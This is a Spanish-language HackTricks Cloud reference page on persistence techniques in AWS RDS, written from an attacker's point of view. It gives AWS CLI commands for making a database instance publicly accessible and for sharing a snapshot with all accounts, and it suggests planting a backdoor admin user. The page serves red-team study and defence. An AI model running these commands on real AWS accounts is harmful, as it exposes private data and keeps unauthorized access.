AWS - RDS Persistencia
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
RDS
Para más información, consulta:
AWS - Relational Database (RDS) Enum
Hacer la instancia accesible públicamente: rds:ModifyDBInstance
Un atacante con este permiso puede modificar una instancia RDS existente para habilitar el acceso público.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Crear un usuario admin dentro de la DB
Un atacante podría simplemente crear un usuario dentro de la DB de modo que, incluso si se modifica la contraseña del usuario master, él no pierde el acceso a la base de datos.
Hacer público el snapshot
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Consulta los subscription plans!
- Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.
HackTricks Cloud

